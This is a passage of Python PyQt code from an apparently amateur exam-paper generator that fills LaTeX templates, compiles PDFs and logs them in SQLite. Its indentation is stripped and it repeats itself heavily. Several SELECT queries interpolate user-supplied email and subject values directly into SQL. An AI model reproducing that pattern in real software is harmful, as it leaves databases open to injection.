self.ui = Ui_Email()
self.ui.setupUi(self.Dialog)
self.ui.label.setText("File with this name already exist")
self.Dialog.setWindowTitle("Alert!")
self.Dialog.show()
except Exception as e:
print(e)
elif self.comma == 4:
self.spli = self.dic[0]
if '\*' in self.spli:
self.spli = self.spli.replace('\*', '\\\\')
self.objec = f'\\\\\\\\\\begin{self.tag} \choice {self.dic[1]} \choice {self.dic[2]} \choice {self.dic[3]} \choice {self.dic[4]} \end{self.tag}'
dict_var = {'date':self.d,'time':self.t,'course code':self.cc,
'course title':self.ct,
'total marks':self.tm,
'exam type':self.et,
'semesteryear':self.Sy,
'estimated time':self.est,
'teachername':self.tn,
'instruction':self.ifs,
'question1':self.spli,
'options1':self.objec
}
file_path = os.path.join(os.getcwd(),"object.dat")
with open(file_path,"w") as f:
for key in dict_var.keys():
print(key)
print(dict_var[key])
print('yes')
f.write(f"{key},{dict_var[key]}\n")
print('hogya')
try:
file = str(self.lineEdit_13.text())
file = file + '.tex'
try:
finalfile = open(file, 'x')
with open('object.tex','r') as firstfile, open(file,'w') as secondfile:
for line in firstfile:
secondfile.write(line)
tex_filename = file
filename, ext = os.path.splitext(tex_filename)
pdf_filename = filename + '.pdf'
subprocess.run(['pdflatex', '-interaction=nonstopmode', tex_filename])
path = pdf_filename
webbrowser.open_new(path)
conn = sqlite3.connect("Database.db")
cur = conn.cursor()
self.ema = str(self.label0.text())
cur.execute("CREATE TABLE IF NOT EXISTS AssessmentOb (PDFDOC TEXT NOT NULL, Subject TEXT NOT NULL, Email TEXT NOT NULL, FOREIGN KEY (Email) REFERENCES user (Email))")
cur.execute("INSERT INTO AssessmentOb (PDFDOC, Subject, Email) VALUES (?,?,?)", (path, self.sub, self.ema))
cur.execute(f"SELECT PDFDOC FROM AssessmentOb WHERE Email = '{self.ema}' AND Subject = '{self.sub}';")
result = cur.fetchall()
conn.commit()
conn.close()
self.Dialog = QtWidgets.QDialog()
self.ui = Ui_Email()
self.ui.setupUi(self.Dialog)
self.ui.label.setText("Successfully Saved")
self.Dialog.setWindowTitle("Confimation Message!")
self.Dialog.show()
except Exception as e:
self.Dialog = QtWidgets.QDialog()
self.ui = Ui_Email()
self.ui.setupUi(self.Dialog)
self.ui.label.setText("File with this name already exist")
self.Dialog.setWindowTitle("Alert!")
self.Dialog.show()
except Exception as e:
print(e)
elif self.comma == 5:
self.spli = self.dic[0]
print('ok')
if '\*' in self.spli:
self.spli = self.spli.replace('\*', '\\\\')
self.objec = f'\\\\\\\\\\begin{self.tag} \choice {self.dic[1]} \choice {self.dic[2]} \choice {self.dic[3]} \choice {self.dic[4]} \choice {self.dic[5]} \end{self.tag}'
dict_var = {'date':self.d,'time':self.t,'course code':self.cc,
'course title':self.ct,
'total marks':self.tm,
'exam type':self.et,
'semesteryear':self.Sy,
'estimated time':self.est,
'teachername':self.tn,
'instruction':self.ifs,
'question1':self.spli,
'options1':self.objec
}
file_path = os.path.join(os.getcwd(),"object.dat")
with open(file_path,"w") as f:
for key in dict_var.keys():
print(key)
print(dict_var[key])
print('yes')
f.write(f"{key},{dict_var[key]}\n")
print('hogya')
try:
file = str(self.lineEdit_13.text())
file = file + '.tex'
try:
finalfile = open(file, 'x')
with open('object.tex','r') as firstfile, open(file,'w') as secondfile:
for line in firstfile:
secondfile.write(line)
tex_filename = file
filename, ext = os.path.splitext(tex_filename)
pdf_filename = filename + '.pdf'
subprocess.run(['pdflatex', '-interaction=nonstopmode', tex_filename])
path = pdf_filename
webbrowser.open_new(path)
conn = sqlite3.connect("Database.db")
cur = conn.cursor()
self.ema = str(self.label0.text())
cur.execute("CREATE TABLE IF NOT EXISTS AssessmentOb (PDFDOC TEXT NOT NULL, Subject TEXT NOT NULL, Email TEXT NOT NULL, FOREIGN KEY (Email) REFERENCES user (Email))")
cur.execute("INSERT INTO AssessmentOb (PDFDOC, Subject, Email) VALUES (?,?,?)", (path, self.sub, self.ema))
cur.execute(f"SELECT PDFDOC FROM AssessmentOb WHERE Email = '{self.ema}' AND Subject = '{self.sub}';")
result = cur.fetchall()
conn.commit()
conn.close()
self.Dialog = QtWidgets.QDialog()
self.ui = Ui_Email()
self.ui.setupUi(self.Dialog)
self.ui.label.setText("Successfully Saved")
self.Dialog.setWindowTitle("Confimation Message!")
self.Dialog.show()
except Exception as e:
self.Dialog = QtWidgets.QDialog()
self.ui = Ui_Email()
self.ui.setupUi(self.Dialog)
self.ui.label.setText("File with this name already exist")
self.Dialog.setWindowTitle("Alert!")
self.Dialog.show()
except Exception as e:
print(e)
#\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ 2 Rows Selected \\\\\\\\\\\\\\\\\\\\\\\\\\\\
elif len(paths) == 2 and self.typ == "Objective":
self.val1 = paths[0]
self.val2 = paths[1]
self.comma = self.val1.count(',')
self.dic = self.val1.split(',', self.comma)
self.objec = f'gha'
self.objec1 = f'gha'
self.spli = ''
self.spli1 = ''
self.comma2 = self.val2.count(',')
self.dic2 = self.val2.split(',', self.comma2)
self.tag = '{oneparchoices}'
if self.comma == 2:
self.spli = self.dic[0]
if '\*' in self.spli:
self.spli = self.spli.replace('\*', '\\\\')
else:
print('yes')
self.objec = f'\\\\\\\\\\begin{self.tag} \choice {self.dic[1]} \choice {self.dic[2]} \end{self.tag}'
elif self.comma == 3:
self.spli = self.dic[0]
if '\*' in self.spli:
self.spli = self.spli.replace('\*', '\\\\')
self.objec = f'\\\\\\\\\\begin{self.tag} \choice {self.dic[1]} \choice {self.dic[2]} \choice {self.dic[3]} \end{self.tag}'
elif self.comma == 4:
self.spli = self.dic[0]
if '\*' in self.spli:
self.spli = self.spli.replace('\*', '\\\\')
self.objec = f'\\\\\\\\\\begin{self.tag} \choice {self.dic[1]} \choice {self.dic[2]} \choice {self.dic[3]} \choice {self.dic[4]} \end{self.tag}'
elif self.comma == 5:
self.spli = self.dic[0]
print('ok')
if '\*' in self.spli:
self.spli = self.spli.replace('\*', '\\\\')
self.objec = f'\\\\\\\\\\begin{self.tag} \choice {self.dic[1]} \choice {self.dic[2]} \choice {self.dic[3]} \choice {self.dic[4]} \choice {self.dic[5]} \end{self.tag}'
#///////////////// option 2
if self.comma2 == 2:
self.spli1 = self.dic2[0]
if '\*' in self.spli1:
self.spli1 = self.spli1.replace('\*', '\\\\')
else:
print('yes')
self.objec1 = f'\\\\\\\\\\begin{self.tag} \choice {self.dic2[1]} \choice {self.dic2[2]} \end{self.tag}'
elif self.comma2 == 3:
self.spli1 = self.dic2[0]
if '\*' in self.spli1:
self.spli1 = self.spli1.replace('\*', '\\\\')
self.objec1 = f'\\\\\\\\\\begin{self.tag} \choice {self.dic2[1]} \choice {self.dic2[2]} \choice {self.dic2[3]} \end{self.tag}'
elif self.comma2 == 4:
self.spli1 = self.dic2[0]
if '\*' in self.spli1:
self.spli1 = self.spli1.replace('\*', '\\\\')
self.objec1 = f'\\\\\\\\\\begin{self.tag} \choice {self.dic2[1]} \choice {self.dic2[2]} \choice {self.dic2[3]} \choice {self.dic2[4]} \end{self.tag}'
elif self.comma2 == 5:
self.spli1 = self.dic2[0]
print('ok')
if '\*' in self.spli1:
self.spli1 = self.spli1.replace('\*', '\\\\')
self.objec1 = f'\\\\\\\\\\begin{self.tag} \choice {self.dic2[1]} \choice {self.dic2[2]} \choice {self.dic2[3]} \choice {self.dic2[4]} \choice {self.dic2[5]} \end{self.tag}'
dict_var = {'date':self.d,'time':self.t,'course code':self.cc,
'course title':self.ct,
'total marks':self.tm,
'exam type':self.et,
'semesteryear':self.Sy,
'estimated time':self.est,
'teachername':self.tn,
'instruction':self.ifs,
'question1':self.spli,
'question2':self.spli1,
'options1':self.objec,
'options2':self.objec1,
}
file_path = os.path.join(os.getcwd(),"object.dat")
with open(file_path,"w") as f:
for key in dict_var.keys():
print(key)
print(dict_var[key])
print('yes')
f.write(f"{key},{dict_var[key]}\n")
print('hogya')
try:
file = str(self.lineEdit_13.text())
file = file + '.tex'
try:
finalfile = open(file, 'x')
with open('object.tex','r') as firstfile, open(file,'w') as secondfile:
for line in firstfile:
secondfile.write(line)
tex_filename = file
filename, ext = os.path.splitext(tex_filename)
pdf_filename = filename + '.pdf'
subprocess.run(['pdflatex', '-interaction=nonstopmode', tex_filename])
path = pdf_filename
webbrowser.open_new(path)
conn = sqlite3.connect("Database.db")
cur = conn.cursor()
self.ema = str(self.label0.text())
cur.execute("CREATE TABLE IF NOT EXISTS AssessmentOb (PDFDOC TEXT NOT NULL, Subject TEXT NOT NULL, Email TEXT NOT NULL, FOREIGN KEY (Email) REFERENCES user (Email))")
cur.execute("INSERT INTO AssessmentOb (PDFDOC, Subject, Email) VALUES (?,?,?)", (path, self.sub, self.ema))
cur.execute(f"SELECT PDFDOC FROM AssessmentOb WHERE Email = '{self.ema}' AND Subject = '{self.sub}';")
result = cur.fetchall()
conn.commit()
conn.close()
self.Dialog = QtWidgets.QDialog()
self.ui = Ui_Email()
self.ui.setupUi(self.Dialog)
self.ui.label.setText("Successfully Saved")
self.Dialog.setWindowTitle("Confimation Message!")
self.Dialog.show()
except Exception as e:
self.Dialog = QtWidgets.QDialog()
self.ui = Ui_Email()
self.ui.setupUi(self.Dialog)
self.ui.label.setText("File with this name already exist")
self.Dialog.setWindowTitle("Alert!")
self.Dialog.show()
except Exception as e:
print(e)
#\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ 3 Rows Selected \\\\\\\\\\\\\\\\\\\\\\\\\
elif len(paths) == 3 and self.typ == "Objective":
self.val1 = paths[0]
self.val2 = paths[1]
self.val3 = paths[2]
self.comma = self.val1.count(',')
self.dic = self.val1.split(',', self.comma)
self.comma2 = self.val2.count(',')
self.dic2 = self.val2.split(',', self.comma2)
self.comma3 = self.val3.count(',')
self.dic3 = self.val3.split(',', self.comma3)
self.objec = f'gha'
self.objec1 = f'gha'
self.objec2 = f'gha'
self.spli = ''
self.spli1 = ''
self.spli2 = ''
self.tag = '{oneparchoices}'
if self.comma == 2:
self.spli = self.dic[0]
if '\*' in self.spli:
self.spli = self.spli.replace('\*', '\\\\')
else:
print('yes')
self.objec = f'\\\\\\\\\\begin{self.tag} \choice {self.dic[1]} \choice {self.dic[2]} \end{self.tag}'
elif self.comma == 3:
self.spli = self.dic[0]
if '\*' in self.spli:
self.spli = self.spli.replace('\*', '\\\\')
self.objec = f'\\\\\\\\\\begin{self.tag} \choice {self.dic[1]} \choice {self.dic[2]} \choice {self.dic[3]} \end{self.tag}'
elif self.comma == 4:
self.spli = self.dic[0]
if '\*' in self.spli:
self.spli = self.spli.replace('\*', '\\\\')
self.objec = f'\\\\\\\\\\begin{self.tag} \choice {self.dic[1]} \choice {self.dic[2]} \choice {self.dic[3]} \choice {self.dic[4]} \end{self.tag}'
elif self.comma == 5:
self.spli = self.dic[0]
print('ok')
if '\*' in self.spli:
self.spli = self.spli.replace('\*', '\\\\')
self.objec = f'\\\\\\\\\\begin{self.tag} \choice {self.dic[1]} \choice {self.dic[2]} \choice {self.dic[3]} \choice {self.dic[4]} \choice {self.dic[5]} \end{self.tag}'
#///////////////// option 2
if self.comma2 == 2:
self.spli1 = self.dic2[0]
if '\*' in self.spli1:
self.spli1 = self.spli1.replace('\*', '\\\\')
else:
print('yes')
self.objec1 = f'\\\\\\\\\\begin{self.tag} \choice {self.dic2[1]} \choice {self.dic2[2]} \end{self.tag}'
elif self.comma2 == 3:
self.spli1 = self.dic2[0]
if '\*' in self.spli1:
self.spli1 = self.spli1.replace('\*', '\\\\')
self.objec1 = f'\\\\\\\\\\begin{self.tag} \choice {self.dic2[1]} \choice {self.dic2[2]} \choice {self.dic2[3]} \end{self.tag}'
elif self.comma2 == 4:
self.spli1 = self.dic2[0]
if '\*' in self.spli1:
self.spli1 = self.spli1.replace('\*', '\\\\')
self.objec1 = f'\\\\\\\\\\begin{self.tag} \choice {self.dic2[1]} \choice {self.dic2[2]} \choice {self.dic2[3]} \choice {self.dic2[4]} \end{self.tag}'
elif self.comma2 == 5:
self.spli1 = self.dic2[0]
print('ok')
if '\*' in self.spli1:
self.spli1 = self.spli1.replace('\*', '\\\\')
self.objec1 = f'\\\\\\\\\\begin{self.tag} \choice {self.dic2[1]} \choice {self.dic2[2]} \choice {self.dic2[3]} \choice {self.dic2[4]} \choice {self.dic2[5]} \end{self.tag}'
#\\\\\\\\\\\\\\\\\\ option 3
if self.comma3 == 2:
self.spli2 = self.dic3[0]
if '\*' in self.spli2:
self.spli2 = self.spli2.replace('\*', '\\\\')
else:
print('yes')
self.objec2 = f'\\\\\\\\\\begin{self.tag} \choice {self.dic3[1]} \choice {self.dic3[2]} \end{self.tag}'
elif self.comma3 == 3:
self.spli2 = self.dic3[0]
if '\*' in self.spli2:
self.spli2 = self.spli2.replace('\*', '\\\\')
self.objec2 = f'\\\\\\\\\\begin{self.tag} \choice {self.dic3[1]} \choice {self.dic3[2]} \choice {self.dic3[3]} \end{self.tag}'
elif self.comma3 == 4:
self.spli2 = self.dic3[0]
if '\*' in self.spli2:
self.spli2 = self.spli2.replace('\*', '\\\\')
self.objec2 = f'\\\\\\\\\\begin{self.tag} \choice {self.dic3[1]} \choice {self.dic3[2]} \choice {self.dic3[3]} \choice {self.dic3[4]} \end{self.tag}'
elif self.comma3 == 5:
self.spli2 = self.dic3[0]
print('ok')
if '\*' in self.spli2:
self.spli2 = self.spli2.replace('\*', '\\\\')
self.objec2 = f'\\\\\\\\\\begin{self.tag} \choice {self.dic3[1]} \choice {self.dic3[2]} \choice {self.dic3[3]} \choice {self.dic3[4]} \choice {self.dic3[5]} \end{self.tag}'
dict_var = {'date':self.d,'time':self.t,'course code':self.cc,
'course title':self.ct,
'total marks':self.tm,
'exam type':self.et,
'semesteryear':self.Sy,
'estimated time':self.est,
'teachername':self.tn,
'instruction':self.ifs,
'question1':self.spli,
'question2':self.spli1,
'question3':self.spli2,
'options1':self.objec,
'options2':self.objec1,
'options3':self.objec2,
}
file_path = os.path.join(os.getcwd(),"object.dat")
with open(file_path,"w") as f:
for key in dict_var.keys():
print(key)
print(dict_var[key])
print('yes')
f.write(f"{key},{dict_var[key]}\n")
print('hogya')
try:
file = str(self.lineEdit_13.text())
file = file + '.tex'
try:
finalfile = open(file, 'x')
with open('object.tex','r') as firstfile, open(file,'w') as secondfile:
for line in firstfile:
secondfile.write(line)
tex_filename = file
filename, ext = os.path.splitext(tex_filename)
pdf_filename = filename + '.pdf'
subprocess.run(['pdflatex', '-interaction=nonstopmode', tex_filename])
path = pdf_filename
webbrowser.open_new(path)
conn = sqlite3.connect("Database.db")
cur = conn.cursor()
self.ema = str(self.label0.text())
cur.execute("CREATE TABLE IF NOT EXISTS AssessmentOb (PDFDOC TEXT NOT NULL, Subject TEXT NOT NULL, Email TEXT NOT NULL, FOREIGN KEY (Email) REFERENCES user (Email))")
cur.execute("INSERT INTO AssessmentOb (PDFDOC, Subject, Email) VALUES (?,?,?)", (path, self.sub, self.ema))
cur.execute(f"SELECT PDFDOC FROM AssessmentOb WHERE Email = '{self.ema}' AND Subject = '{self.sub}';")
result = cur.fetchall()
conn.commit()
conn.close()
self.Dialog = QtWidgets.QDialog()
self.ui = Ui_Email()
self.ui.setupUi(self.Dialog)
self.ui.label.setText("Successfully Saved")
self.Dialog.setWindowTitle("Confimation Message!")
self.Dialog.show()
except Exception as e:
self.Dialog = QtWidgets.QDialog()
self.ui = Ui_Email()
self.ui.setupUi(self.Dialog)
self.ui.label.setText("File with this name already exist")
self.Dialog.setWindowTitle("Alert!")
self.Dialog.show()
except Exception as e:
print(e)
#else:
# self.Dialog = QtWidgets.QDialog()
# self.ui = Ui_Email()
# self.ui.setupUi(self.Dialog)
# self.Dialog.setWindowTitle("Alert!")
# self.ui.label.setText("Select within the range (3)")
# self.Dialog.show()
#print("select within the range (3)")
#\Subjective \\\\\\\\\\\\\\\\\\\\\\\Subjective \\\\\\\\\\\\\\\\\\\\\\\\\ Subjective
if len(paths) == 1 and self.typ == "Subjective":
self.val1 = paths[0]
if '\*' in self.val1:
self.val1 = self.val1.replace('\*', '\\\\')
dict_var = {'date':self.d,'time':self.t,'course code':self.cc,
'course title':self.ct,
'total marks':self.tm,
'exam type':self.et,
'semesteryear':self.Sy,
'estimated time':self.est,
'teachername':self.tn,
'instruction':self.ifs,
'question1':self.val1,
'question2':'',
'question3':'',
'question4':'',
'question5':'',
'question6':'',
}
file_path = os.path.join(os.getcwd(),"dot.dat")
with open(file_path,"w") as f:
for key in dict_var.keys():
print(key)
print(dict_var[key])
print('yes')
f.write(f"{key},{dict_var[key]}\n")
print('hogya')
try:
file = str(self.lineEdit_13.text())
file = file + '.tex'
try:
finalfile = open(file, 'x')
with open('dot.tex','r') as firstfile, open(file,'w') as secondfile:
for line in firstfile:
secondfile.write(line)
tex_filename = file
filename, ext = os.path.splitext(tex_filename)
pdf_filename = filename + '.pdf'
subprocess.run(['pdflatex', '-interaction=nonstopmode', tex_filename])
path = pdf_filename
webbrowser.open_new(path)
conn = sqlite3.connect("Database.db")
cur = conn.cursor()
self.ema = str(self.label0.text())
cur.execute("CREATE TABLE IF NOT EXISTS AssessmentSub (PDFDOC TEXT NOT NULL, Subject TEXT NOT NULL, Email TEXT NOT NULL, FOREIGN KEY (Email) REFERENCES user (Email))")
cur.execute("INSERT INTO AssessmentSub (PDFDOC, Subject, Email) VALUES (?,?,?)", (path, self.sub, self.ema))
cur.execute(f"SELECT PDFDOC FROM AssessmentSub WHERE Email = '{self.ema}' AND Subject = '{self.sub}';")
result = cur.fetchall()
conn.commit()
conn.close()
self.Dialog = QtWidgets.QDialog()
self.ui = Ui_Email()
self.ui.setupUi(self.Dialog)
self.ui.label.setText("Successfully Saved")
self.Dialog.setWindowTitle("Confimation Message!")
self.Dialog.show()
except Exception as e:
self.Dialog = QtWidgets.QDialog()
self.ui = Ui_Email()
self.ui.setupUi(self.Dialog)
self.ui.label.setText("File with this name already exist")
self.Dialog.setWindowTitle("Alert!")
self.Dialog.show()
except Exception as e:
print(e)
elif len(paths) == 2 and self.typ == "Subjective":
self.val1 = paths[0]
self.val2 = paths[1]
dict_var = {'date':self.d,'time':self.t,'course code':self.cc,
'course title':self.ct,
'total marks':self.tm,
'exam type':self.et,
'semesteryear':self.Sy,
'estimated time':self.est,
'teachername':self.tn,
'instruction':self.ifs,
'question1':self.val1,
'question2':self.val2,
'question3':'',
'question4':'',
'question5':'',
'question6':'',
}
file_path = os.path.join(os.getcwd(),"dot.dat")
with open(file_path,"w") as f:
for key in dict_var.keys():
print(key)
print(dict_var[key])
print('yes')
f.write(f"{key},{dict_var[key]}\n")
print('hogya')
try:
file = str(self.lineEdit_13.text())
file = file + '.tex'
try:
finalfile = open(file, 'x')
with open('dot.tex','r') as firstfile, open(file,'w') as secondfile:
for line in firstfile:
secondfile.write(line)
tex_filename = file
filename, ext = os.path.splitext(tex_filename)
pdf_filename = filename + '.pdf'
subprocess.run(['pdflatex', '-interaction=nonstopmode', tex_filename])
path = pdf_filename
webbrowser.open_new(path)
conn = sqlite3.connect("Database.db")
cur = conn.cursor()
self.ema = str(self.label0.text())
cur.execute("CREATE TABLE IF NOT EXISTS AssessmentSub (PDFDOC TEXT NOT NULL, Subject TEXT NOT NULL, Email TEXT NOT NULL, FOREIGN KEY (Email) REFERENCES user (Email))")
cur.execute("INSERT INTO AssessmentSub (PDFDOC, Subject, Email) VALUES (?,?,?)", (path, self.sub, self.ema))
cur.execute(f"SELECT PDFDOC FROM AssessmentSub WHERE Email = '{self.ema}' AND Subject = '{self.sub}';")
result = cur.fetchall()
conn.commit()
conn.close()
self.Dialog = QtWidgets.QDialog()
self.ui = Ui_Email()
self.ui.setupUi(self.Dialog)
self.ui.label.setText("Successfully Saved")
self.Dialog.setWindowTitle("Confimation Message!")
self.Dialog.show()
except Exception as e:
self.Dialog = QtWidgets.QDialog()
self.ui = Ui_Email()
self.ui.setupUi(self.Dialog)
self.ui.label.setText("File with this name already exist")
self.Dialog.setWindowTitle("Alert!")
self.Dialog.show()
except Exception as e:
print(e)
elif len(paths) == 3 and self.typ == "Subjective":
self.val1 = paths[0]
self.val2 = paths[1]
self.val3 = paths[2]
dict_var = {'date':self.d,'time':self.t,'course code':self.cc,
'course title':self.ct,
'total marks':self.tm,
'exam type':self.et,
'semesteryear':self.Sy,
'estimated time':self.est,
'teachername':self.tn,
'instruction':self.ifs,
'question1':self.val1,
'question2':self.val2,
'question3':self.val3,
'question4':'',
'question5':'',
'question6':'',
}
file_path = os.path.join(os.getcwd(),"dot.dat")
with open(file_path,"w") as f:
for key in dict_var.keys():
print(key)
print(dict_var[key])
print('yes')
f.write(f"{key},{dict_var[key]}\n")
print('hogya')
try:
file = str(self.lineEdit_13.text())
file = file + '.tex'
try:
finalfile = open(file, 'x')
with open('dot.tex','r') as firstfile, open(file,'w') as secondfile:
for line in firstfile:
secondfile.write(line)
tex_filename = file
filename, ext = os.path.splitext(tex_filename)
pdf_filename = filename + '.pdf'
subprocess.run(['pdflatex', '-interaction=nonstopmode', tex_filename])
path = pdf_filename
webbrowser.open_new(path)
conn = sqlite3.connect("Database.db")
cur = conn.cursor()
self.ema = str(self.label0.text())
cur.execute("CREATE TABLE IF NOT EXISTS AssessmentSub (PDFDOC TEXT NOT NULL, Subject TEXT NOT NULL, Email TEXT NOT NULL, FOREIGN KEY (Email) REFERENCES user (Email))")
cur.execute("INSERT INTO AssessmentSub (PDFDOC, Subject, Email) VALUES (?,?,?)", (path, self.sub, self.ema))
cur.execute(f"SELECT PDFDOC FROM AssessmentSub WHERE Email = '{self.ema}' AND Subject = '{self.sub}';")
result = cur.fetchall()
conn.commit()
conn.close()
self.Dialog = QtWidgets.QDialog()
self.ui = Ui_Email()
self.ui.setupUi(self.Dialog)
self.ui.label.setText("Successfully Saved")
self.Dialog.setWindowTitle("Confimation Message!")
self.Dialog.show()
except Exception as e:
self.Dialog = QtWidgets.QDialog()
self.ui = Ui_Email()
self.ui.setupUi(self.Dialog)
self.ui.label.setText("File with this name already exist")
self.Dialog.setWindowTitle("Alert!")
self.Dialog.show()
except Exception as e:
print(e)
elif len(paths) == 4 and self.typ == "Subjective":
self.val1 = paths[0]
self.val2 = paths[1]
self.val3 = paths[2]
self.val4 = paths[3]
dict_var = {'date':self.d,'time':self.t,'course code':self.cc,
'course title':self.ct,
'total marks':self.tm,
'exam type':self.et,
'semesteryear':self.Sy,
'estimated time':self.est,
'teachername':self.tn,
'instruction':self.ifs,
'question1':self.val1,
'question2':self.val2,
'question3':self.val3,
'question4':self.val4,
'question5':'',
'question6':''
}
file_path = os.path.join(os.getcwd(),"dot.dat")
with open(file_path,"w") as f:
for key in dict_var.keys():
print(key)
print(dict_var[key])
print('yes')
f.write(f"{key},{dict_var[key]}\n")
print('hogya')
try:
file = str(self.lineEdit_13.text())
file = file + '.tex'
try:
finalfile = open(file, 'x')
with open('dot.tex','r') as firstfile, open(file,'w') as secondfile:
for line in firstfile:
secondfile.write(line)
tex_filename = file
filename, ext = os.path.splitext(tex_filename)
pdf_filename = filename + '.pdf'
subprocess.run(['pdflatex', '-interaction=nonstopmode', tex_filename])
path = pdf_filename
webbrowser.open_new(path)
conn = sqlite3.connect("Database.db")
cur = conn.cursor()
self.ema = str(self.label0.text())
cur.execute("CREATE TABLE IF NOT EXISTS AssessmentSub (PDFDOC TEXT NOT NULL, Subject TEXT NOT NULL, Email TEXT NOT NULL, FOREIGN KEY (Email) REFERENCES user (Email))")
cur.execute("INSERT INTO AssessmentSub (PDFDOC, Subject, Email) VALUES (?,?,?)", (path, self.sub, self.ema))
cur.execute(f"SELECT PDFDOC FROM AssessmentSub WHERE Email = '{self.ema}' AND Subject = '{self.sub}';")
result = cur.fetchall()
conn.commit()
conn.close()
self.Dialog = QtWidgets.QDialog()
self.ui = Ui_Email()
self.ui.setupUi(self.Dialog)
self.ui.label.setText("Successfully Saved")
self.Dialog.setWindowTitle("Confimation Message!")
self.Dialog.show()
except Exception as e:
self.Dialog = QtWidgets.QDialog()
self.ui = Ui_Email()
self.ui.setupUi(self.Dialog)
self.ui.label.setText("File with this name already exist")
self.Dialog.setWindowTitle("Alert!")
self.Dialog.show()
except Exception as e:
print(e)
elif len(paths) == 5 and self.typ == "Subjective":
self.val1 = paths[0]
self.val2 = paths[1]
self.val3 = paths[2]
self.val4 = paths[3]
self.val5 = paths[4]
dict_var = {'date':self.d,'time':self.t,'course code':self.cc,
'course title':self.ct,
'total marks':self.tm,
'exam type':self.et,
'semesteryear':self.Sy,
'estimated time':self.est,
'teachername':self.tn,
'instruction':self.ifs,
'question1':self.val1,
'question2':self.val2,
'question3':self.val3,
'question4':self.val4,
'question5':self.val5,
'question6':'',
}
file_path = os.path.join(os.getcwd(),"dot.dat")
with open(file_path,"w") as f:
for key in dict_var.keys():
print(key)
print(dict_var[key])
print('yes')
f.write(f"{key},{dict_var[key]}\n")
print('hogya')
try:
file = str(self.lineEdit_13.text())
file = file + '.tex'
try:
finalfile = open(file, 'x')
with open('dot.tex','r') as firstfile, open(file,'w') as secondfile:
for line in firstfile:
secondfile.write(line)
tex_filename = file
filename, ext = os.path.splitext(tex_filename)
pdf_filename = filename + '.pdf'
subprocess.run(['pdflatex', '-interaction=nonstopmode', tex_filename])
path = pdf_filename
webbrowser.open_new(path)
conn = sqlite3.connect("Database.db")
cur = conn.cursor()
self.ema = str(self.label0.text())
cur.execute("CREATE TABLE IF NOT EXISTS AssessmentSub (PDFDOC TEXT NOT NULL, Subject TEXT NOT NULL, Email TEXT NOT NULL, FOREIGN KEY (Email) REFERENCES user (Email))")
cur.execute("INSERT INTO AssessmentSub (PDFDOC, Subject, Email) VALUES (?,?,?)", (path, self.sub, self.ema))
cur.execute(f"SELECT PDFDOC FROM AssessmentSub WHERE Email = '{self.ema}' AND Subject = '{self.sub}';")
result = cur.fetchall()
conn.commit()
conn.close()
self.Dialog = QtWidgets.QDialog()
self.ui = Ui_Email()
self.ui.setupUi(self.Dialog)
self.ui.label.setText("Successfully Saved")
self.Dialog.setWindowTitle("Confimation Message!")
self.Dialog.show()
except Exception as e:
self.Dialog = QtWidgets.QDialog()
self.ui = Ui_Email()
self.ui.setupUi(self.Dialog)
self.ui.label.setText("File with this name already exist")
self.Dialog.setWindowTitle("Alert!")
self.Dialog.show()
except Exception as e:
print(e)
elif len(paths) == 6 and self.typ == "Subjective":
self.val1 = paths[0]
self.val2 = paths[1]
self.val3 = paths[2]
self.val4 = paths[3]
self.val5 = paths[4]
self.val6 = paths[5]
dict_var = {'date':self.d,'time':self.t,'course code':self.cc,
'course title':self.ct,
'total marks':self.tm,
'exam type':self.et,
'semesteryear':self.Sy,
'estimated time':self.est,
'teachername':self.tn,
'instruction':self.ifs,
'question1':self.val1,
'question2':self.val2,
'question3':self.val3,
'question4':self.val4,
'question5':self.val5,
'question6':self.val6
}
file_path = os.path.join(os.getcwd(),"dot.dat")
with open(file_path,"w") as f:
for key in dict_var.keys():
print(key)
print(dict_var[key])
print('yes')
f.write(f"{key},{dict_var[key]}\n")
print('hogya')
try:
file = str(self.lineEdit_13.text())
file = file + '.tex'
try:
finalfile = open(file, 'x')
with open('dot.tex','r') as firstfile, open(file,'w') as secondfile:
for line in firstfile:
secondfile.write(line)
tex_filename = file
filename, ext = os.path.splitext(tex_filename)
pdf_filename = filename + '.pdf'
subprocess.run(['pdflatex', '-interaction=nonstopmode', tex_filename])
path = pdf_filename
webbrowser.open_new(path)
conn = sqlite3.connect("Database.db")
cur = conn.cursor()
self.ema = str(self.label0.text())
cur.execute("CREATE TABLE IF NOT EXISTS AssessmentSub (PDFDOC TEXT NOT NULL, Subject TEXT NOT NULL, Email TEXT NOT NULL, FOREIGN KEY (Email) REFERENCES user (Email))")
cur.execute("INSERT INTO AssessmentSub (PDFDOC, Subject, Email) VALUES (?,?,?)", (path, self.sub, self.ema))
cur.execute(f"SELECT PDFDOC FROM AssessmentSub WHERE Email = '{self.ema}' AND Subject = '{self.sub}';")
result = cur.fetchall()
conn.commit()
conn.close()
self.Dialog = QtWidgets.QDialog()
self.ui = Ui_Email()
self.ui.setupUi(self.Dialog)
self.ui.label.setText("Successfully Saved")
self.Dialog.setWindowTitle("Confimation Message!")
self.Dialog.show()
except Exception as e:
self.Dialog = QtWidgets.QDialog()
self.ui = Ui_Email()
self.ui.setupUi(self.Dialog)
self.ui.label.setText("File with this name already exist")
self.Dialog.setWindowTitle("Alert!")
self.Dialog.show()
except Exception as e:
print(e)
except Exception as e:
self.Dialog = QtWidgets.QDialog()
self.ui = Ui_Email()
self.ui.setupUi(self.Dialog)
self.Dialog.setWindowTitle("Alert!")
self.ui.label.setText(e)
self.Dialog.show()
def generateD(self):
#os.system("pdflatex dot.tex")
#path = 'dot.pdf'
#webbrowser.open_new(path)
try:
save_var_latex("helo", 20)
save_var_latex("total_score", 30)
# TeX source filename
tex_filename = 'dash.tex'
filename, ext = os.path.splitext(tex_filename)
# the corresponding PDF filename
pdf_filename = filename + '.pdf'
# compile TeX file
subprocess.run(['pdflatex', '-interaction=nonstopmode', tex_filename])
path = 'dash.pdf'
webbrowser.open_new(path)
# check
#if PDF is successfully generated
#if not os.path.exists(pdf_filename):
# raise RuntimeError('PDF output not found')
# open PDF with platform - specific command
# if platform.system().lower() == 'darwin':
# subprocess.run(['open', pdf_filename])
# elif platform.system().lower() == 'windows':
# os.startfile(pdf_filename)
# elif platform.system().lower() == 'linux':
# subprocess.run(['xdg-open', pdf_filename])
# else :
# raise RuntimeError('Unknown operating system "{}"'.format(platform.system()))
# f = open("dot.tex", "r")
# f.ope
except Exception as e:
print(e)
def getImageLabelSub(self, image):
try:
imagelabel = QtWidgets.QLabel(self.centralwidget)
imagelabel.setText("")
imagelabel.setScaledContents(True)
pixmap = QtGui.QPixmap()
print("error")
